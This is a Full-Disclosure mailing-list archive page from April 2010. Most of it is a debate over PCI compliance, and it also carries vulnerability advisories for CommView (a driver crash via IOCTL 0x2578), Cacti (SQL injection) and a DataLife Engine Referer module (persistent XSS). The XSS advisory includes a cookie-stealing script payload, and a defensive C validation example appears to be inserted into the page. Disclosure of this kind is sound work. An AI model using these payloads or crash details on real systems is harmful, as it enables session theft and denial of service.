 transaction to a gateway, you are not handling it.  If you DO handle 
 it, then you have to comply with PCI.  If you process less than 1 
 million transactions a year, you can “self audit.”  If you process more, you 
 have to be audited by a PCI auditor.



 None of this MEANS you are secure, it means you comply.  If you don't 
 like PCI, then don't process credit cards, or come up with your own.  
 I still don't really see what all the hubbub is about here.



 t



 From: Christian Sciberras [mailto:uuf6...@gmail.com]
 Sent: Friday, April 23, 2010 9:29 AM
 To: Thor (Hammer of God)
 Cc: Christopher Gilbert; Mike Hale; full-disclosure; 
 security-bas...@securityfocus.com
 Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds



 it is simply part of the cost of doing business in that market.
 A.k.a. wasted money. Truth be told, I'm no fan of PCI.
 Other companies get the same functionality (accept the storage of 
 credit
 cards) without worrying about PCI/DSS (e.g. through Payment Gateways).
 In the end, as a service, what do I want, an inventory of credit 
 cards, or a stable payment system? The latter I guess.
 As to security, it totally depends on implementation; one can handle 
 credit cards without the need of standards compliance.

 My two cents.

 Regards,
 Christian Sciberras.


 On Fri, Apr 23, 2010 at 6:07 PM, Thor (Hammer of God) 

[Full-disclosure] [CORELAN-10-30] - CommView Network Monitor And Analyzer v6.1 b644 - cv2k1.sys DoS (BSOD)

2010-04-23 Thread Security

|--------------------------------------------------------------------------|
|                            corelan team                                  |
|                                                                          |
|                       http://www.corelan.be:8800                         |
|                        secur...@corelan.be                               |
|                                                                          |
|-------------------------[ EIP Hunters ]----------------------------------|
|                                                                          |
|                   Vulnerability Disclosure Report                        |
|                                                                          |
|--------------------------------------------------------------------------|



Advisory : CORELAN-10-030
Disclosure date : April 23rd, 2010
 
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-030

 
0x00 : Vulnerability information
 
 Product : CommView Network Monitor And Analyzer
 Version : CommView 6.1 before Build 644
 Vendor : http://www.tamos.com/
 URL : http://www.tamos.com/download/main/ 
 Type of vulnerability : Local Denial Of Service - BSOD
 Risk rating : Low
 Issue fixed in version : CommView 6.1 Build 644
 Vulnerability discovered by : p4r4noid (T.B)
 Greetings to : Corelan Security Team 
(http://www.corelan.be:8800/index.php/security/corelan-team-members/)
 



0x01 : Vendor description of software

From the vendor website:

CommView is a powerful network monitor and analyzer designed for LAN 
administrators, security professionals, network programmers, home 
users...virtually anyone who wants a full picture of the traffic flowing 
through a PC or LAN segment. 
Loaded with many user-friendly features, CommView combines performance and 
flexibility with an ease of use unmatched in the industry.
Price information
Home: $149.00



0x02 : Vulnerability details

Local Denial Of Service:
 
When the CommView application is installed on a host, the cv2k1.sys driver is
loaded on the machine.
This driver allows any unprivileged user to open the device \\.\CV2K_{GUID} and
issue IOCTLs (0x2578) with a buffering mode of METHOD_BUFFERED without any
kind of validation.
The cv2k1.sys driver uses the METHOD_BUFFERED communication method when
handling IOCTL requests and does not properly validate the buffer sent in the
Irp object, allowing local unprivileged attackers to crash an affected system,
creating a denial of service condition.
Affected Device: cv2k1.sys (\Device\CV2K_{GUID})
Affected IOCTL: 0x2578
KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (108e).
Method: METHOD_BUFFERED
STACK_TEXT:

WARNING: Stack unwind information not available. Following frames may be wrong.
f58e5c18 84b05e30 84aeeca8 8605e690 84b05ea0 cv2k1+0x1faa
f58e5c34 804e3d77 84ba5038 2578 806ee2d0 0x84b05e30
f58e5c44 8056a9ab 84b05ea0 860cbb08 84b05e30 nt!IopfCallDriver+0x31
f58e5c58 8057d9f7 84ba5038 84b05e30 860cbb08 nt!IopSynchronousServiceTail+0x60
f58e5d00 8057fbfa 07b8   nt!IopXxxControlFile+0x611
f58e5d34 804df06b 07b8   nt!NtDeviceIoControlFile+0x2a
f58e5d34 7c90eb94 07b8   nt!KiFastCallEntry+0xf8
0012ff00     0x7c90eb94

IOCTL example:

InBuff: 0x8001,  InSize: 0x
OutBuff: 0x8002, OutSize: 0x



0x03 : Vendor communication

18th Nov, 2009 : Vendor contacted
11th Apr, 2010 : Fixed Build Published
23rd Apr, 2010 : Public Disclosure
 

0x04 : Exploit/PoC
http://www.corelan.be:8800/advisories.php?id=CORELAN-10-030

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
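The buffer validation the advisory describes as missing, as an added example (not Corelan's code and not the vendor's driver): a user-mode C model of a METHOD_BUFFERED dispatch routine that decodes control code 0x2578 and checks the IRP's buffer pointer and lengths before touching the system buffer. The mock IRP, the demo_request/demo_reply layouts and the DEMO_MAGIC value are assumptions; the driver's real request format is not on the page.

```c
/* Added example (not Corelan's or the vendor's code): a user-mode model of the
 * METHOD_BUFFERED IOCTL validation the advisory says cv2k1.sys lacks.
 * mock_irp, demo_request/demo_reply and DEMO_MAGIC are assumptions. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* CTL_CODE layout: DeviceType<<16 | Access<<14 | Function<<2 | Method */
#define METHOD_BUFFERED 0u
typedef struct { uint32_t device_type, access, function, method; } ctl_code_fields;

ctl_code_fields decode_ctl_code(uint32_t code) {
    ctl_code_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}

/* Stand-in for what a METHOD_BUFFERED handler reads from the IRP: the
 * DeviceIoControl parameters in the current stack location and
 * Irp->AssociatedIrp.SystemBuffer, one buffer shared for input and output
 * (NULL when both lengths are zero). */
typedef struct {
    uint32_t control_code, input_len, output_len;
    void    *system_buffer;
} mock_irp;

/* Hypothetical request/reply layouts; the real ones are not on the page. */
typedef struct { uint32_t magic, value; } demo_request;
typedef struct { uint32_t echoed; } demo_reply;
#define IOCTL_DEMO 0x2578u      /* the IOCTL named in the advisory */
#define DEMO_MAGIC 0xC0FFEEu    /* assumed */

/* NTSTATUS values a dispatch routine would return. */
#define STATUS_SUCCESS                0x00000000u
#define STATUS_INVALID_DEVICE_REQUEST 0xC0000010u
#define STATUS_BUFFER_TOO_SMALL       0xC0000023u
#define STATUS_INVALID_PARAMETER      0xC000000Du

/* Hardened dispatch: control code, buffer pointer and both lengths are checked
 * before SystemBuffer is read or written; omitting them is what lets a
 * malformed request from an unprivileged caller take the kernel down. */
uint32_t handle_ioctl_checked(mock_irp *irp, uint32_t *bytes_written) {
    *bytes_written = 0;
    if (irp->control_code != IOCTL_DEMO ||
        decode_ctl_code(irp->control_code).method != METHOD_BUFFERED)
        return STATUS_INVALID_DEVICE_REQUEST;
    if (irp->system_buffer == NULL)
        return STATUS_INVALID_PARAMETER;
    if (irp->input_len < sizeof(demo_request) || irp->output_len < sizeof(demo_reply))
        return STATUS_BUFFER_TOO_SMALL;

    demo_request req;
    memcpy(&req, irp->system_buffer, sizeof req);   /* copy out before use */
    if (req.magic != DEMO_MAGIC)
        return STATUS_INVALID_PARAMETER;
    demo_reply rep = { req.value + 1 };
    memcpy(irp->system_buffer, &rep, sizeof rep);   /* fits: output_len checked */
    *bytes_written = sizeof rep;
    return STATUS_SUCCESS;
}

/* Constructed scenarios: undersized request, no system buffer, well-formed. */
uint32_t scenario_short_input(void) {
    uint8_t buf[1] = { 0 };
    mock_irp irp = { IOCTL_DEMO, 1, 1, buf };
    uint32_t n;
    return handle_ioctl_checked(&irp, &n);          /* STATUS_BUFFER_TOO_SMALL */
}

uint32_t scenario_empty_request(void) {
    mock_irp irp = { IOCTL_DEMO, 0, 0, NULL };
    uint32_t n;
    return handle_ioctl_checked(&irp, &n);          /* STATUS_INVALID_PARAMETER */
}

uint32_t scenario_valid_request(void) {
    uint8_t buf[sizeof(demo_request)];
    demo_request req = { DEMO_MAGIC, 41 };
    demo_reply rep;
    uint32_t n;
    memcpy(buf, &req, sizeof req);
    mock_irp irp = { IOCTL_DEMO, sizeof(demo_request), sizeof(demo_reply), buf };
    if (handle_ioctl_checked(&irp, &n) != STATUS_SUCCESS || n != sizeof rep)
        return 0;
    memcpy(&rep, buf, sizeof rep);
    return rep.echoed;                              /* 42 */
}

int main(void) {
    ctl_code_fields f = decode_ctl_code(IOCTL_DEMO);
    printf("IOCTL 0x%X: function 0x%X, method %u\n", IOCTL_DEMO, f.function, f.method);
    printf("short input   -> 0x%08X\n", scenario_short_input());
    printf("empty request -> 0x%08X\n", scenario_empty_request());
    printf("valid request -> echoed %u\n", scenario_valid_request());
    return 0;
}
```

The low two bits of 0x2578 are zero, which is why the advisory reports METHOD_BUFFERED; the length checks are the part a reviewer would look for in the real dispatch routine.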


Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Mike Hale
Look at the PCI requirements.

What's unreasonable about them?  Which portions are *NOT* part of
having a secure network?

If you strive for security, and weave that into your network,
complying with PCI should be cake.

On Fri, Apr 23, 2010 at 10:40 AM, Stephen Mullins
steve.mullins.w...@gmail.com wrote:
I don't see what the hubbub is

 Some people in the information security industry actually care about
 securing systems and the information they contain rather than filling
 in check boxes.  Compliance may ensure a minimum standard is met, but
 it does not ensure or imply that real security is being maintained at
 an organization.

 As you say, PCI has become a cost of doing business whereas having a
 secure network is apparently not a cost of doing business.  This is a
 problem.

 Crazy notion, I know.

 On Fri, Apr 23, 2010 at 1:18 PM, Thor (Hammer of God)
 t...@hammerofgod.com wrote:
 How can you say it is “wasted”? It doesn’t matter if you are a “fan” of it
 or not, in the same way that it doesn’t matter if you are a “fan” of the 4%
 surcharge retail establishments pay to accept the credit card as payment.
 Using your logic, you would say it is “wasted money,” and might bring into
 question the “value” of the surcharge, etc.  It is simply a cost of doing
 business.



 If you choose to offload processing to a payment gateway, then that will
 also incur a cost.  Depending on your volume, that cost may or may not be
 higher than you processing them yourself while complying to standards.  The
 implementation of actual security measures will be different.  But you can’t
 “handle” credit cards in the classic sense of the word without complying
 with PCI.  If you pass along the transaction to a gateway, you are not
 handling it.  If you DO handle it, then you have to comply with PCI.  If you
 process less than 1 million transactions a year, you can “self audit.”  If
 you process more, you have to be audited by a PCI auditor.



 None of this MEANS you are secure, it means you comply.  If you don’t like
 PCI, then don’t process credit cards, or come up with your own.  I still
 don’t really see what all the hubbub is about here.



 t



 From: Christian Sciberras [mailto:uuf6...@gmail.com]
 Sent: Friday, April 23, 2010 9:29 AM
 To: Thor (Hammer of God)
 Cc: Christopher Gilbert; Mike Hale; full-disclosure;
 security-bas...@securityfocus.com
 Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds



 it is simply part of the cost of doing business in that market.
 A.k.a. wasted money. Truth be told, I'm no fan of PCI.
 Other companies get the same functionality (accept the storage of credit
 cards) without worrying about PCI/DSS (e.g. through Payment Gateways).
 In the end, as a service, what do I want, an inventory of credit cards, or a
 stable payment system? The latter I guess.
 As to security, it totally depends on implementation; one can handle credit
 cards without the need of standards compliance.

 My two cents.

 Regards,
 Christian Sciberras.


 On Fri, Apr 23, 2010 at 6:07 PM, Thor (Hammer of God) t...@hammerofgod.com
 wrote:

 Another thing that I think people fail to keep in mind is that when it comes
 to PCI, it is part of a contractual agreement between the entity and card
 facility they are working with.   If a business wants to accept credit cards
 as a means of payment (based on volume) then part of their agreement is that
 they must undergo compliance to a standard implemented by the industry.  I
 don’t know why people get all emotional about it and throw up their hands
 with all the “this is wasted money” positioning – it’s not wasted at all; it
 is simply part of the cost of doing business in that market.



 t



 From: full-disclosure-boun...@lists.grok.org.uk
 [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christopher
 Gilbert
 Sent: Thursday, April 22, 2010 4:48 PM
 To: Mike Hale
 Cc: full-disclosure; security-bas...@securityfocus.com
 Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds



 The paper concludes that companies are underinvesting in--or improperly
 prioritizing--the protection of their secrets. Nowhere does it state that
 the money spent on compliance is money wasted.

 On Wed, Apr 21, 2010 at 5:44 PM, Mike Hale eyeronic.des...@gmail.com
 wrote:

 I find the findings completely flawed.  Am I missing something?






[Full-disclosure] Vulnerability in Referer for DataLife Engine

2010-04-23 Thread MustLive
Hello Full-Disclosure!

I want to warn you about a security vulnerability in the Referer module for
DataLife Engine (DLE).

-
Advisory: Vulnerability in Referer for DataLife Engine
-
URL: http://websecurity.com.ua/3942/
-
Affected products: Referer (aka Perehody in Russian) v.6.9 and previous
versions.
-
Timeline:

29.06.2009 - found vulnerability.
11.02.2010 - announced at my site.
13.02.2010 - informed admin of web site where I found the vulnerability.
15.02.2010 - informed developers of DataLife Engine (at first I thought that
hole existed in DLE, and admin of vulnerable web site didn't answer me and
didn't fix the hole, but DLE developers said that hole is not in their
engine and they didn't know what the module it is).
19.02.2010 - informed developers of the module (after I found that it's
Referer module).
23.04.2010 - disclosed at my site.
-
Details:

This is Cross-Site Scripting vulnerability.

XSS:

It's a persistent XSS vulnerability, which allows one to conduct the attack via
the Referer header, in cases where immediate links to queries in search engines
are shown at the site.

Referer:
http://www.google.com/search?q=xss;scriptalert(document.cookie)/script

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



Re: [Full-disclosure] We must work harder on cloud, says Microsoft

2010-04-23 Thread Georgi Guninski
On Wed, Apr 21, 2010 at 07:43:36PM -0400, Jason Nada wrote:
 
 The funny thing about the cloud is that eventually there is going to be a 
 monopoly of one company that dominates in it. Just as Microsoft has done with 
 software, I can see Microsoft CloudSoft coming soon.


and when the cloud gets 0wned, the botnet market will restructure.

c'est la vie ;)

m$, we need more dancing monkeys and more cake-faced mentally ill people
at higher positions, please help...

-- 





Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Michael Holstein

 You don't think in-house payment gateways can be as stable as third
 party gateways?
   

Probably not .. it goes back to the "how many 9s can you afford to pay
for" question.

But in-house has the advantage of knowing who to yell at when it breaks.
Management generally prefers to yell locally instead of being told "I
dunno, ask the cloud."

Cheers,

Michael Holstein
Cleveland State University



[Full-disclosure] [SECURITY] [DSA 2039-1] New cacti packages fix missing input sanitising

2010-04-23 Thread Thijs Kinkhorst

- 
Debian Security Advisory DSA-2039-1  secur...@debian.org
http://www.debian.org/security/  Thijs Kinkhorst
April 23, 2010    http://www.debian.org/security/faq
- 

Package: cacti
Vulnerability  : missing input sanitising
Problem type   : remote
Debian-specific: no
Debian Bug : 578909

It was discovered that Cacti, a frontend to rrdtool for monitoring
systems and services, missed input sanitising, making an SQL injection
attack possible.

For the stable distribution (lenny), this problem has been fixed in
version 0.8.7b-2.1+lenny2.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your cacti package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
- 

Source archives:

  
  http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny2.diff.gz
    Size/MD5 checksum:    37338 16b43e80a447a185f5372372836104ed
  http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b.orig.tar.gz
    Size/MD5 checksum:  1972444 aa8a740a6ab88e3634b546c3e1bc502f
  http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny2.dsc
    Size/MD5 checksum:     1408 468d418ebedfd326081cbb159c159b55

Architecture independent packages:

  
  http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny2_all.deb
    Size/MD5 checksum:  1826020 b88356b2559091ae8444b93b5234e881


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-annou...@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg



Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Christian Sciberras
If you strive for security, and weave that into your network,
complying with PCI should be cake.

Uhm.. No. NO. PCI is an unnecessary hassle. What makes signing a document
any more secure than having a server facing the wild of the net?

Truth is, PCI doesn't help in security at all. It is at most a sense of false
security (and at least serves as a recreational exercise for auditors).

Thor, I'm not arguing with the article, since I didn't read it, and I won't
bother to. I just want to point out some hard facts about PCI/DSS which you
call no big deal.
I surely agree with that, but what is not a big deal for you doesn't mean it
ain't for the rest of the world.
What stops an uninformed programmer from complying with PCI/DSS (or at
least, thinking so) and leaving RFI/XSS/whatever holes everywhere?
That said, security flaws are just about everywhere so no need to get
critical about it. For now at least.

The point isn't who should be using credit cards or not, it's a matter of
security.

I find it strange that you're excusing marketing propaganda.

Sincere regards,
Christian Sciberras.



On Fri, Apr 23, 2010 at 7:42 PM, Mike Hale eyeronic.des...@gmail.com wrote:

 Look at the PCI requirements.

 What's unreasonable about them?  Which portions are *NOT* part of
 having a secure network?

 If you strive for security, and weave that into your network,
 complying with PCI should be cake.


Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Thor (Hammer of God)
Marketing propaganda?  I have no idea what you are talking about.

Before commenting on PCI not helping at all and at the most being a false sense 
of security, let me ask:

1)  Does the company you work for perform PCI audits?

2)  Is the company you work for required to undergo PCI audits?

3)  Are you certified to be able to perform a PCI audit?

4)  Have you ever been directly involved with, as in contributing to, a PCI 
audit, and if so, in what capacity?

I would like to see some truthful expansion on the answers to those questions 
before continuing dialog about if PCI contributes to security or not.

t


Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Christian Sciberras
No problem with that.

1) No.
2) Planning to, but no.
3) Heavens no.
4) I've looked into whether it was in our best interest to use PCI. (it
was decided that it wasn't worth the trouble)
At that time, I knew about PCI but not its details, at which point we got
someone to explain it in detail for us.
The end decision wasn't mine, though.
We do take security as a main concern; however, it is preferred to have a
more realistic approach to security rather than restrict employees' access
(by signing some oath..).

Regards,
Christian Sciberras.





Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Christian Sciberras
Sorry, forgot to reply to your quoting me about false sense of security. Let
me explain myself.

It is relatively easy to forget real security concerns (such as [really]
bad coding) when one follows a checklist for high security (quoting
pcisecuritystandards.org).

Unless I missed something (which I don't think I did) PCI/DSS doesn't help
at all since it is putting security methodologies on your project
manager's desk, rather than getting an IT Security specialist to do the job.

Cheers.



On Sat, Apr 24, 2010 at 12:33 AM, Christian Sciberras uuf6...@gmail.comwrote:

 No problem with that.

 1) No.
 2) Planning to, but no.
 3) Heavens no.
 4) I've looked into whether it was into our best interest to use PCI. (it
 was decided that it wasn't worth the trouble)
 At that time, I knew about PCI but not its details, at which point we got
 someone to explain in detail for us.
 The end decision wasn't mine, though.
 We do take security as a main concern, however, it is preferred to have a
 more realistic approach to security rather then restrict employees' access
 (by signing some oath..).

 Regards,
 Christian Sciberras.





 On Sat, Apr 24, 2010 at 12:22 AM, Thor (Hammer of God) 
 t...@hammerofgod.com wrote:

 Marketing propaganda?  I have no idea what you are talking about.



 Before commenting on PCI not helping at all and at the most being a false
 sense of security, let me ask:

 1)  Does the company you work for perform PCI audits?

 2)  Is the company you work for required to undergo PCI audits?

 3)  Are you certified to be able to perform a PCI audit?

 4)  Have you ever been directly involved with, as in contributing to,
 a PCI audit, and if so, in what capacity?



 I would like to see some truthful expansion on the answers to those
 questions before continuing dialog about if PCI contributes to security or
 not.



 t



 *From:* Christian Sciberras [mailto:uuf6...@gmail.com]
 *Sent:* Friday, April 23, 2010 3:02 PM
 *To:* Mike Hale
 *Cc:* Stephen Mullins; full-disclosure; security-bas...@securityfocus.com;
 Thor (Hammer of God)

 *Subject:* Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds



 If you strive for security, and weave that into your network,
 complying with PCI should be cake.

 Uhm.. No. NO. PCI is an unnecessary hassle. What makes signing a document
 any more secure then having server facing the wild of the net?

 Truth is, PCI doesn't help in security at all. It at most a sense of false
 security (and at least serves as a recreational exercise for auditors).

 Thor, I'm not arguing with the article, since I didn't read it, and I
 won't bother to. I just want to point out some hard facts about PCI/DSS
 which you call no big deal.
 I surely agree with that, but what is not a big deal for you doesn't mean
 it ain't for the rest of the world.
 What stops an uninformed programmer from complying with PCI/DSS (or at
 least, think to) and leave  RFI/XSS/whatever holes everywhere?
 That said, security flaws are just about everywhere so no need to get
 critical about it. For now at least.

 The point isn't who should be using credit cards or not, it's a matter
 of security.

 I find it strange that you're excusing marketing propaganda.

 Sincere regards,
 Christian Sciberras.


 On Fri, Apr 23, 2010 at 7:42 PM, Mike Hale eyeronic.des...@gmail.com
 wrote:

 Look at the PCI requirements.

 What's unreasonable about them?  Which portions are *NOT* part of
 having a secure network?

 If you strive for security, and weave that into your network,
 complying with PCI should be cake.


 On Fri, Apr 23, 2010 at 10:40 AM, Stephen Mullins
 steve.mullins.w...@gmail.com wrote:
 I don't see what the hubbub is
 
  Some people in the information security industry actually care about
  securing systems and the information they contain rather than filling
  in check boxes.  Compliance may ensure a minimum standard is met, but
  it does not ensure or imply that real security is being maintained at
  an organization.
 
  As you say, PCI has become a cost of doing business whereas having a
  secure network is apparently not a cost of doing business.  This is a
  problem.
 
  Crazy notion, I know.
 
  On Fri, Apr 23, 2010 at 1:18 PM, Thor (Hammer of God)
  t...@hammerofgod.com wrote:
  How can you say it is “wasted”? It doesn’t matter if you are a “fan” of it
  or not, in the same way that it doesn’t matter if you are a “fan” of the 4%
  surcharge retail establishments pay to accept the credit card as payment.
  Using your logic, you would say it is “wasted money,” and might bring into
  question the “value” of the surcharge, etc.  It is simply a cost of doing
  business.
 
 
 
  If you choose to offload processing to a payment gateway, then that will
  also incur a cost.  Depending on your volume, that cost may or may not be
  higher than you processing them yourself while complying to standards.  The
  implementation of actual security measures will be different.  But you can’t
  

Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Thor (Hammer of God)
OK - so, when you say "to use PCI" what do you mean?  I get the feeling that
you are equating being "PCI certified" as something people just "get" to show
other people they are "secure."  Hence your use of "marketing propaganda."

People don't go through an audit and get PCI certified so that they can claim
they are secure.  It doesn't work like that.  PCI (Payment Card Industry)
compliance is what people HAVE to do, as in FORCED to do whether they want to
or not, in order to be able to process credit cards.  If you process less than
1 million xactions per year, you can "self audit."  Can you lie?  Sure.  But
you'll get your ability to process payments yanked if they catch you.  More
than that requires an auditor.  If that auditor finds you have horrible
security controls in place, you will fail.  If they pass you anyway, they can
lose their certification to audit.  If you fail, you have x time to get with
the program and be audited again.

It's just a way for the CC industry to make sure the people handling card info
follow best practices for security.  That's all it means - it is a
certification FOR the industry BY the industry.  No one ever said it meant
people had "real security."  It means companies illustrate a base of practices
required to handle consumer credit card data.  That's it.

And I totally agree with Mike Hale's comments about "if you are really secure,
as in 'already secure' then it's cake."  I don't know that I would say "cake"
as it depends on the scope of audit, but he's right.  If you already have a
drive to secure your infrastructure, then PCI should be easy.  My requirements
for security are far more strict than PCI.  Yours may or may not be, so you'll
have to adjust as necessary.

Regarding code, I do believe that in PCI audits for dev that you have to 
illustrate an SDL, in which case things like XSS and BOs and such would be part 
of.

That's the skinny on PCI :)

t

From: Christian Sciberras [mailto:uuf6...@gmail.com]
Sent: Friday, April 23, 2010 3:34 PM
To: Thor (Hammer of God)
Cc: Mike Hale; Stephen Mullins; full-disclosure; 
security-bas...@securityfocus.com
Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

No problem with that.

1) No.
2) Planning to, but no.
3) Heavens no.
4) I've looked into whether it was in our best interest to use PCI. (it was
decided that it wasn't worth the trouble)
At that time, I knew about PCI but not its details, at which point we got 
someone to explain in detail for us.
The end decision wasn't mine, though.
We do take security as a main concern, however, it is preferred to have a more
realistic approach to security rather than restrict employees' access (by
signing some oath...).

Regards,
Christian Sciberras.



On Sat, Apr 24, 2010 at 12:22 AM, Thor (Hammer of God) 
t...@hammerofgod.com wrote:
Marketing propaganda?  I have no idea what you are talking about.

Before commenting on PCI not helping at all and at the most being a false sense 
of security, let me ask:

1)  Does the company you work for perform PCI audits?

2)  Is the company you work for required to undergo PCI audits?

3)  Are you certified to be able to perform a PCI audit?

4)  Have you ever been directly involved with, as in contributing to, a PCI 
audit, and if so, in what capacity?

I would like to see some truthful expansion on the answers to those questions 
before continuing dialog about if PCI contributes to security or not.

t

From: Christian Sciberras [mailto:uuf6...@gmail.com]
Sent: Friday, April 23, 2010 3:02 PM
To: Mike Hale
Cc: Stephen Mullins; full-disclosure; 
security-bas...@securityfocus.com;
Thor (Hammer of God)

Subject: Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

If you strive for security, and weave that into your network,
complying with PCI should be cake.

Uhm.. No. NO. PCI is an unnecessary hassle. What makes signing a document any
more secure than having a server facing the wild of the net?

Truth is, PCI doesn't help in security at all. It is at most a sense of false
security (and at least serves as a recreational exercise for auditors).

Thor, I'm not arguing with the article, since I didn't read it, and I won't 
bother to. I just want to point out some hard facts about PCI/DSS which you 
call no big deal.
I surely agree with that, but what is not a big deal for you doesn't mean it 
ain't for the rest of the world.
What stops an uninformed programmer from complying with PCI/DSS (or at least
thinking they do) and leaving RFI/XSS/whatever holes everywhere?
That said, security flaws are just about everywhere so no need to get critical 
about it. For now at least.

The point isn't who should be using credit cards or not, it's a matter of 
security.

I find it strange that you're excusing marketing propaganda.

Sincere regards,
Christian Sciberras.

On Fri, Apr 23, 2010 at 7:42 PM, Mike Hale 

Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread BMF
On Fri, Apr 23, 2010 at 3:33 PM, Christian Sciberras uuf6...@gmail.com wrote:
 4) I've looked into whether it was in our best interest to use PCI. (it
 was decided that it wasn't worth the trouble)
 At that time, I knew about PCI but not its details, at which point we got
 someone to explain in detail for us.

This right here screams bullshitter. It isn't as if you get to
decide if you want to use PCI or not. If you process credit cards with
the major card brands you are going to do PCI either now or
eventually. There is no other security standard which you can choose.
You also show signs of being a victim of absolutism. Nobody has ever
claimed that PCI makes you secure. It is a minimal standard which
experience has shown most companies need spelled out for them. There
is much more than just the things spelled out by PCI that need to be
done. As usual in these situations, your real complaint isn't about
PCI but about the people who just don't get the point.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds

2010-04-23 Thread Christian Sciberras
I just want to emphasize a point you mentioned right now:

It means companies illustrate a *base* of practices required to handle
consumer credit card data.

So why waste resources, time and money when one would be better off with
proper security measures?
As Mr Hale said, it's a piece of cake if you had the right stuff already
going. Problem is, it's a piece of expensive cake.

I just want[ed] to make my point clear; I don't see any discussion about this
at all.
As I already said, it is not my intention to argue with the original
message.

Cheers.


On Sat, Apr 24, 2010 at 12:46 AM, Thor (Hammer of God) t...@hammerofgod.com
 wrote:

 OK – so, when you say “to use PCI” what do you mean?  I get the feeling
 that you are equating being “PCI certified” as something people just “get”
 to show other people they are “secure.”  Hence your use of “marketing
 propaganda.”



 People don’t go through an audit and get PCI certified so that they can
 claim they are secure.  It doesn’t work like that.  PCI (Payment Card
 Industry) compliance is what people HAVE to do, as in FORCED to do whether
 they want to or not, in order to be able to process credit cards.  If you
 process less than 1 million xactions per year, you can “self audit.”  Can
 you lie?  Sure.  But you’ll get your ability to process payments yanked if
 they catch you.  More than that requires an auditor.  If that auditor finds
 you have horrible security controls in place, you will fail.  If they pass
 you anyway, they can lose their certification to audit.  If you fail, you
 have x time to get with the program and be audited again.



 It’s just a way for the CC industry to make sure the people handling card
 info follow best practices for security.  That’s all it means – it is a
 certification FOR the industry BY the industry.  No one ever said it meant
 people had “real security.”  It means companies illustrate a base of
 practices required to handle consumer credit card data.  That’s it.



 And I totally agree with Mike Hale’s comments about “if you are really
 secure, as in ‘already secure’ then it’s cake.”  I don’t know that I would
 say “cake” as it depends on the scope of audit, but he’s right.  If you
 already have a drive to secure your infrastructure, then PCI should be
 easy.  My requirements for security are far more strict than PCI.  Yours may
 or may not be, so you’ll have to adjust as necessary.



 Regarding code, I do believe that in PCI audits for dev that you have to
 illustrate an SDL, in which case things like XSS and BOs and such would be
 part of.



 That’s the skinny on PCI :)



 t



 *From:* Christian Sciberras [mailto:uuf6...@gmail.com]
 *Sent:* Friday, April 23, 2010 3:34 PM

 *To:* Thor (Hammer of God)
 *Cc:* Mike Hale; Stephen Mullins; full-disclosure;
 security-bas...@securityfocus.com

 *Subject:* Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds



 No problem with that.

 1) No.
 2) Planning to, but no.
 3) Heavens no.
 4) I've looked into whether it was in our best interest to use PCI. (it
 was decided that it wasn't worth the trouble)
 At that time, I knew about PCI but not its details, at which point we got
 someone to explain in detail for us.
 The end decision wasn't mine, though.
 We do take security as a main concern, however, it is preferred to have a
 more realistic approach to security rather than restrict employees' access
 (by signing some oath...).

 Regards,
 Christian Sciberras.



 On Sat, Apr 24, 2010 at 12:22 AM, Thor (Hammer of God) 
 t...@hammerofgod.com wrote:

 Marketing propaganda?  I have no idea what you are talking about.



 Before commenting on PCI not helping at all and at the most being a false
 sense of security, let me ask:

 1)  Does the company you work for perform PCI audits?

 2)  Is the company you work for required to undergo PCI audits?

 3)  Are you certified to be able to perform a PCI audit?

 4)  Have you ever been directly involved with, as in contributing to,
 a PCI audit, and if so, in what capacity?



 I would like to see some truthful expansion on the answers to those
 questions before continuing dialog about if PCI contributes to security or
 not.



 t



 *From:* Christian Sciberras [mailto:uuf6...@gmail.com]
 *Sent:* Friday, April 23, 2010 3:02 PM
 *To:* Mike Hale
 *Cc:* Stephen Mullins; full-disclosure; security-bas...@securityfocus.com;
 Thor (Hammer of God)


 *Subject:* Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds



 If you strive for security, and weave that into your network,
